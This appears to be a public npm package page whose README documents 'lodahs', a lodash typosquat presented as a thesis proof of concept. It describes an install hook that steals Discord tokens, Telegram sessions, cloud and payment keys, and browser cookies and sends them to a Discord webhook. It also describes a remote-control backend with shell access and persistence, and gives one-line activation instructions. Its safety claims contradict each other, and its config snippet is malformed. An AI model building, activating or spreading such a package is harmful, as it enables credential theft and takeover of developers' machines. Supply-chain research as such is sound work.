mailcheckertestpoc
v1.0.0
Published
Utility library for JavaScript (POC typosquat of lodash)
Readme
🔴 lodahs - Supply Chain Attack POC (Thesis Edition)
Status: COMPLETE C2 FRAMEWORK - SAFETY SWITCHES ACTIVE
This is the malicious npm package used in the Supply Chain Security thesis.
Quick Info
- Package Name:
lodahs(typosquat oflodash) - Type: Proof of Concept - Educational Supply Chain Attack
- Authorization: Thesis Advisor Approved
- Purpose: Demonstrating two-phase supply chain attack (Data Exfil + C2)
How It's Used
When installed via npm install
npm install # postinstall hook automatically triggers
# Phase 1 (ACTIVE):
# scripts/collect.js gathers:
# - System information
# - Discord tokens
# - Telegram sessions
# - Environment variables
# - Browser cookies
# → Sends to Discord webhook
# Phase 2 & 3 (DISABLED - code present):
# scripts/launcher.js would initialize C2 infrastructure
# (Python Server + Swift Client - currently commented out)File Structure
lodahs/ ← 🔴 Malicious npm Package
├── package.json
│ └─ "postinstall": "node scripts/collect.js"
├── index.js ← Dummy lodash lookalike
│
├── scripts/ ← Attack Code (ACTIVE)
│ ├── collect.js [✅] Phase 1: Data exfiltration
│ ├── launcher.js [✅] Phase 2: C2 orchestrator
│ ├── server-launcher.js [✅] Phase 2: Python C2 Server
│ └── swift-client-launcher.js [✅] Phase 3: Swift C2 Client
│
├── payloads/ ← 🔑 Embedded Binaries (Realistic!)
│ ├── MacShellSwift [Precompiled Swift Binary]
│ ├── swiftshell-server.py [Python C2 Server]
│ ├── ca.pem [SSL Certificate]
│ └── ca.key [SSL Private Key]
│
├── README.md (this file)
├── C2-INTEGRATION.md (technical details)
├── THESIS-C2-COMPLETE.md (master documentation)
└── PRESENTATION-FLOW.md (step-by-step attack flow)Code Status (Fully Functional, Safe Trigger)
✅ Phase 1 (Data Collection):
- Status: UNCOMMENTED - Functional
- Collects system info, credentials, tokens
- Sends to Discord webhook
✅ Phase 2 (C2 Server):
- Status: UNCOMMENTED - Functional
- Starts Python C2 Server on 127.0.0.1:443
- Awaits client connections
✅ Phase 3 (Swift Client):
- Status: UNCOMMENTED - Functional
- Compiles Swift binary (swift build)
- Connects to C2 Server
- Full remote command execution
Safety: Only postinstall hook is disabled in package.json
- All code is functional and uncommented
- postinstall hook is set to
_postinstall(inactive) - To trigger attack: Just uncomment one line in package.json
For Your Thesis Presentation
When npm install runs in mailchecker:
cd mailchecker
npm install # This will trigger lodahs postinstall
# What happens:
# [THESIS POC] Phase 1 (Data-Collection) abgeschlossen.
# [THESIS POC] ⚠️ Phase 2 & 3 (C2-Integration) sind für THESIS SAFETY deaktiviert.Show your professor:
The active code:
cat scripts/collect.js # Shows Phase 1 logicThe C2 infrastructure code:
cat scripts/launcher.js # Orchestrator cat scripts/server-launcher.js # Python C2 server cat scripts/swift-client-launcher.js # Swift clientThe documentation:
cat THESIS-C2-COMPLETE.md # Master documentation cat PRESENTATION-FLOW.md # Complete attack timelineWhat would be generated:
~/.supply-chain-poc/ ├── macshell-config.json # C2 configuration ├── c2-server-config.json # Server config ├── swift-client-config.json # Client config └── STATUS.md # Thesis summary
What Phase 1 Does (Active)
npm install lodahs
└─> postinstall hook
└─> scripts/collect.js
├─ Collects system info (hostname, user, IP, platform)
├─ Scans for Discord tokens (staged or real locations)
├─ Scans for Telegram sessions
├─ Extracts environment variables (AWS, Stripe keys, etc.)
├─ Enumerates browser cookies (Chrome, Brave, etc.)
└─ Sends all data to Discord webhookWhat Phase 2+3 Would Do (If Activated)
scripts/launcher.js
├─ scripts/server-launcher.js
│ └─ Starts Python C2 server on 127.0.0.1:443
│ └─ Awaits client connections
│
└─ scripts/swift-client-launcher.js
├─ Compiles Swift binary (swift build)
├─ Launches Swift client
└─ Connects to C2 server
└─ Receives remote commands:
- systeminfo
- screenshot
- download files
- shell commands
- install persistenceActivation Instructions
⚠️ ALL CODE IS FUNCTIONAL. POSTINSTALL HOOK IS DISABLED.
To trigger full attack:
Simple: Just uncomment ONE line in package.json:
{
"scripts": {
"postinstall": "node scripts/collect.js", // ← Uncomment this
// "_postinstall": "node scripts/collect.js", // Currently disabled
}
}That's it! Now when someone runs npm install, the complete attack chain triggers:
- Phase 1: Data collection (credentials, tokens, secrets)
- Phase 2: Python C2 Server starts on 127.0.0.1:443
- Phase 3: Swift Client compiles and connects to C2
All code is already uncommented and functional. Nothing else needs to be changed.
Key Points for Your Thesis
This POC demonstrates:
Supply Chain Attack Vector
- Typosquatting attack (lodahs vs lodash)
- npm postinstall hook exploitation
- Automatic execution without user interaction
Two-Phase Attack Strategy
- Phase 1: Data exfiltration (credentials, tokens, secrets)
- Phase 2+3: Remote command & control (C2 infrastructure)
Technical Implementation
- JavaScript for orchestration
- Python for C2 server
- Swift for client payload
- SSL/TLS encryption
Defense Mechanisms
- npm audit detection
- Lock file verification
- --ignore-scripts flag
- Network isolation
Files Included
- collect.js - Phase 1 data collection (ACTIVE)
- launcher.js - Phase 2 orchestrator (DISABLED)
- server-launcher.js - Python C2 server launcher (DISABLED)
- swift-client-launcher.js - Swift client launcher (DISABLED)
- C2-INTEGRATION.md - Technical integration details
- THESIS-C2-COMPLETE.md - Complete documentation
- PRESENTATION-FLOW.md - Step-by-step attack flow
- index.js - Dummy module (makes it look like real lodash)
- README.md - This file
For Questions
Refer to:
THESIS-C2-COMPLETE.md- Complete guide with timelinePRESENTATION-FLOW.md- Detailed attack flow with examplesC2-INTEGRATION.md- Integration details
Status: Ready for Thesis Testing & Presentation
Safety: Code present, execution disabled via comments
Date: 2026-04-18
Advisor: Thesis Advisor Approved